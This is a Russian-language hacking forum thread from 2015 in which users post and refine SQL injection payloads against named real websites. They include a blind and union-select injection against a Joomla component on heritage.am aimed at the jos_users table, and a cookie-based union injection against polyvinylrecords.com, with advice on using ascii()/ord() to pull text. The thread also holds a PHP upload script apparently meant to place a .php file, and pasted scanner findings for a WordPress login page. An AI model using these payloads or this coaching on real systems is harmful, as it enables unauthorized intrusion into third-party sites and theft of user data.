HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.07.2015, 18:19
lindau
Guest
Сообщений: n/a
Провел на форуме:
669

Репутация: 0
По умолчанию

Цитата:
Сообщение от yarbabin  
yarbabin said:

увы, вывода нет.
Код:
Code:
http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+and+1=2/*%00*/union+select+6666666666--+
Вот жеж беда =((

Для посимвольного перебора тогда получается так: http://www.heritage.am/ru/component...*/+and+substring((select+version()),1,1)=5--+ ?

Это ведь Joomla, стандартная таблица jos_users?
 
Ответить с цитированием

  #2  
Старый 08.07.2015, 20:56
djon
Guest
Сообщений: n/a
Провел на форуме:
2873

Репутация: 0
По умолчанию

Почему когда пробую отправить файл через форму







ссылка преобразуется так www.site.ru/?file=dk.php и файл или картинка не запускается,просто обычную страницу грузит
 
Ответить с цитированием

  #3  
Старый 08.07.2015, 22:27
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от djon  
djon said:

Почему когда пробую отправить файл через форму

ссылка преобразуется так
www.site.ru/?file=dk.php
и файл или картинка не запускается,просто обычную страницу грузит
начните с азов. html это язык разметки, а не язык программирования. через него вы не сможете залить файл
 
Ответить с цитированием

  #4  
Старый 09.07.2015, 02:37
djon
Guest
Сообщений: n/a
Провел на форуме:
2873

Репутация: 0
По умолчанию

-------------------------------------------------------------------------------------------------------------------------------------------------

Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to 'http://www.site.ru/p1/dk.php' in /home/u941469589/public_html/upload.php on line 12

-------------------------------------------------------------------------------------------------------------------------------------------------

сама форма

-------------------------------------------------------------------------------------------------------------------------------------------------







-------------------------------------------------------------------------------------------------------------------------------------------------

сам upload.php

-------------------------------------------------------------------------------------------------------------------------------------------------

1024*3*1024)

{

echo ("Размер файла превышает три мегабайта");

exit;

}

// Проверяем загружен ли файл

if(is_uploaded_file($_FILES["filename"]["tmp_name"]))

{

// Если файл загружен успешно, перемещаем его

// из временной директории в конечную

move_uploaded_file($_FILES["filename"]["tmp_name"], "http://www.site.ru/p1/".$_FILES["filename"]["name"]);

} else {

echo("Ошибка загрузки файла");

}

?>

-------------------------------------------------------------------------------------------------------------------------------------------------
 
Ответить с цитированием

  #5  
Старый 09.07.2015, 08:53
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

.SpoilerTarget" type="button">Spoiler: Инфа которая поможет
Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь

Сведения об уязвимости

обнаружено, что данные пароля передаются через HTTP.

влияние

Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.

Действия, чтобы Взять

См средство для решения.

Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.

средство

Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.

Форма цель действия :

http://*******.ru/wp-login.php . Сайт я не скажу естественно . Дак вот что мне нужно сделать? .

Есть HTML код страницы

.SpoilerTarget" type="button">Spoiler
?

















******.ru › Войти













*******.ru

-->









Имя пользователя







Пароль





Запомнить меня











Регистрация | Забыли пароль?

function wp_attempt_focus(){

setTimeout( function(){ try{

d = document.getElementById('user_login');

d.focus();

d.select();

} catch(e){}

}, 200);

}

wp_attempt_focus();

if(typeof wpOnload=='function')wpOnload();

document.write("")

← Назад к сайту «*******.ru»











Не знаю поможет ли это :

GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpos t-id%257D&reauth=1 HTTP/1.1

Cache-Control: no-cache

Referer: http://*****.ru/wp-admin/post.php?action=edit&post={post-id}

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker

Accept-Language: en-us,en;q=0.5

X-Scanner: ******

Host: ****.ru

Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d 0b01c3be92e0d0d

Accept-Encoding: gzip, deflate

---------------------------------------------------------------------------------------

robots.txt :

User-agent: *

Disallow: /cgi-bin/

Disallow: /wp-admin/

Allow: /doc/

Allow: /img/

Allow: /wp-content/uploads/

-------------------------------------------

Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.

HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )

влияние

Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.

Действия, чтобы Взять

См средство для решения.

Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).

средство

Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.

Внешние ссылки

Как это сделать ? .

-----------------------------------------------------------------------------------

Url http://*******.ru/wp-login.php?action=lostpassword

Identified Field Name user_login .

Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.

Это были важные поля, такие как "кредитная карта".

Влияние

Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.

Действия, чтобы Взять

Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.

Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.

Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.

Требуемые навыки для успешной эксплуатации

Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.

Внешние ссылки

Использование автозаполнения в HTML форм

П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .

-----------------------------------------------------------------------

Url http://*******.ru/crossdomain.xml

Правила политики

Классификация Классификация

OWASP 2010 A6

OWASP 2013 А5

КВО 16

WASC 15

Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.

влияние

Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.

средство

Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.

Внешние ссылки

Рекомендации по использованию файла политики кросс-доменных для Flash Player

Crossdomain.xml приглашает Cross-Site Mayhem .

Как это сделать?

[/spoiler=Инфа которая поможет]
 
Ответить с цитированием

  #6  
Старый 09.07.2015, 10:20
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep

.SpoilerTarget" type="button">Spoiler: POST
Host: www.polyvinylrecords.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+unio n+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7 CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHT ZEY5EYCVTEEGZ%3A20150708%3A1

Connection: keep-alive

Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?
 
Ответить с цитированием

  #7  
Старый 09.07.2015, 11:47
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:

https://www.polyvinylrecords.com/we...te/eomsA19bR_Oe5L4nQhdVrw?product_id=split_ep
Spoiler: POST
Host:
www.polyvinylrecords.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.478174453.1436420788; PHPSESSID=vm6ku7j5ht07atf0n4gthmepk1; cart=k453dj5moskdvjcki8sbblbka69999999999999'+unio n+select+1,mid(version(),1,4),3,4,5+--+; __ar_v4=%7C7K674WVRA5EQTKVG7RIBHQ%3A20150708%3A1%7 CSRBJNEWXLNH6JM5MFYZHWM%3A20150708%3A1%7CON7KI2FHT ZEY5EYCVTEEGZ%3A20150708%3A1
Connection: keep-alive
Показываются только цифры, можно что нибудь придумать, что бы буквы тоже выводились ?
Использовать ascii(mid(version(),1,4)) или ord(mid(version(),1,4))
 
Ответить с цитированием

  #8  
Старый 09.07.2015, 12:05
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Spoiler: Инфа которая поможет
Ребят у меня есть программа для поиска уязвимости,я перевёл гуглом так что не ругайтесь
Сведения об уязвимости
обнаружено, что данные пароля передаются через HTTP.
влияние
Если злоумышленник может перехватить трафик, он / она может украсть учетные данные пользователей.
Действия, чтобы Взять
См средство для решения.
Переместить все ваши критические форм и страниц HTTPS и не служи им через HTTP.
средство
Все конфиденциальные данные должны быть переданы по протоколу HTTPS, а не HTTP. Формы должны быть поданы в течение HTTPS. Все аспекты применения, которые принимают пользовательский ввод, начиная с процесса входа в систему, должны обслуживаться только через HTTPS.
Форма цель действия :
http://*******.ru/wp-login.php
. Сайт я не скажу естественно . Дак вот что мне нужно сделать? .
Есть HTML код страницы
Spoiler
?

******.ru › Войти

*******.ru
-->

Имя пользователя

Пароль

Запомнить меня

Регистрация | Забыли пароль?

function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}
wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();

document.write("")

← Назад к сайту «*******.ru»

Не знаю поможет ли это :
GET /wp-login.php?redirect_to=http%3A%2F%2F*****.ru%2Fwp-admin%2Fpost.php%3Faction%3Dedit%26post%3D%257Bpos t-id%257D&reauth=1 HTTP/1.1
Cache-Control: no-cache
Referer:
http://*****.ru/wp-admin/post.php?action=edit&post={post-id}
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: ******
Host: ****.ru
Cookie: 21e558d425bf38e4a2473c40a5b0b2b9=85df36e59c655c31d 0b01c3be92e0d0d
Accept-Encoding: gzip, deflate
---------------------------------------------------------------------------------------
robots.txt :
User-agent: *
Disallow: /cgi-bin/
Disallow: /wp-admin/
Allow: /doc/
Allow: /img/
Allow: /wp-content/uploads/
-------------------------------------------
Сведения об уязвимости определены cookie(s), не помеченных как HttpOnly.
HttpOnly cookie(s) не может быть прочитан на стороне клиента сценариев, поэтому маркировка печенье, как HttpOnly может обеспечить дополнительный уровень защиты от атак межсайтового скриптинга(это вроде xxs . )
влияние
Во время межсайтового сценария атаки(xxs?), злоумышленник может легко получить доступ к куки и угнать сессию жертвы.
Действия, чтобы Взять
См средство для решения.
Рассмотрим маркировки всех печенье, используемых приложением как HttpOnly. (После этих изменений JavaScript код не будет в состоянии прочитать печенье).
средство
Отметить куки, как HttpOnly. Это будет дополнительный слой защиты от XSS. Однако это не серебряная пуля и не будет защищать систему от атак межсайтового скриптинга.Злоумышленник может использовать такой инструмент, как XSS туннель, чтобы обойти HttpOnly защиты.
Внешние ссылки
Как это сделать ? .
-----------------------------------------------------------------------------------
Url
http://*******.ru/wp-login.php?action=lostpassword
Identified Field Name user_login .
Сведения об уязвимости обнаружено, что автополный включен в одном или нескольких полях формы.
Это были важные поля, такие как "кредитная карта".
Влияние
Если пользователь выбирает для сохранения, данные, введенные в этих областях будут кэшироваться браузером. Злоумышленник, могут получить доступ к браузеру жертвы мог украсть эту информацию. Это особенно важно, если приложение обычно используется в общих компьютеров, таких как интернет-кафе или терминалов аэропорта.
Действия, чтобы Взять
Добавить атрибут автозаполнения = "OFF" в виде тега или отдельных «входных» полей.
Найти все экземпляры входов, которые хранят личные данные и выключить автозаполнение. Поля, которые содержат данные, такие как "кредитная карта" или "CCV" типа данных, не следует кэшировать. Вы можете позволить приложению кэшировать имена и запоминать пароли; Однако, в большинстве случаев это не рекомендуется.
Re-сканирование приложения после устранения выявленных проблем, чтобы обеспечить все исправления были применены правильно.
Требуемые навыки для успешной эксплуатации
Во-первых, злоумышленник должен либо физический доступ или права выполнения кода пользовательского уровня для успешной эксплуатации. Демпинг все данные из браузера может быть довольно легко, и количество автоматизированных инструментов существуют для проведения этого. Где злоумышленник не может выводить данные, он / она все еще может просматривать недавно посещенные веб-сайты и активировать функцию автозаполнения, чтобы увидеть ранее введенные значения.
Внешние ссылки
Использование автозаполнения в HTML форм
П.С : При переходе на ссылку мне предлагают ввести емайл или логин где я получу новый пасс,естественно пашет токо на зареганный пользователей .
-----------------------------------------------------------------------
Url
http://*******.ru/crossdomain.xml
Правила политики
Классификация Классификация
OWASP 2010 A6
OWASP 2013 А5
КВО 16
WASC 15
Сведения об уязвимости обнаружил открытый файл crossdomain.xml политики.
влияние
Открыть файл политики crossdomain.xml позволяет другие файлы SWF, чтобы HTTP запросов к веб-серверу и увидеть его реакцию. Это может быть использован для доступа к одно время жетоны и CSRF одноразовые номера, чтобы обойти CSRF ограничений.
средство
Настройте crossdomain.xml, чтобы предотвратить доступ отовсюду к вашему домену.
Внешние ссылки
Рекомендации по использованию файла политики кросс-доменных для Flash Player
Crossdomain.xml приглашает Cross-Site Mayhem .
Как это сделать?
[/spoiler=Инфа которая поможет]
1. логины пароли идут не через SSL

2. у кук нет свойства httpOnly

3. crossdomain.xml: читать тут /threads/300591/
 
Ответить с цитированием

  #9  
Старый 09.07.2015, 12:07
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от djon  
djon said:

-------------------------------------------------------------------------------------------------------------------------------------------------
Что я делаю не так ?выдает ошибку Warning: move_uploaded_file(): Unable to move '/tmp/phpT9YXce' to '
http://www.site.ru/p1/dk.php
' in /home/u941469589/public_html/upload.php on line 12
-------------------------------------------------------------------------------------------------------------------------------------------------
сама форма
-------------------------------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------------------------------
сам upload.php
-------------------------------------------------------------------------------------------------------------------------------------------------
1024*3*1024)
{
echo ("Размер файла превышает три мегабайта");
exit;
}
// Проверяем загружен ли файл
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
// Если файл загружен успешно, перемещаем его
// из временной директории в конечную
move_uploaded_file($_FILES["filename"]["tmp_name"], "
http://www.site.ru/p1/
".$_FILES["filename"]["name"]);
} else {
echo("Ошибка загрузки файла");
}
?>
-------------------------------------------------------------------------------------------------------------------------------------------------
путь должен быть локальным. у вас он есть в ошибке: /home/u941469589/public_html/
 
Ответить с цитированием

  #10  
Старый 09.07.2015, 13:51
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ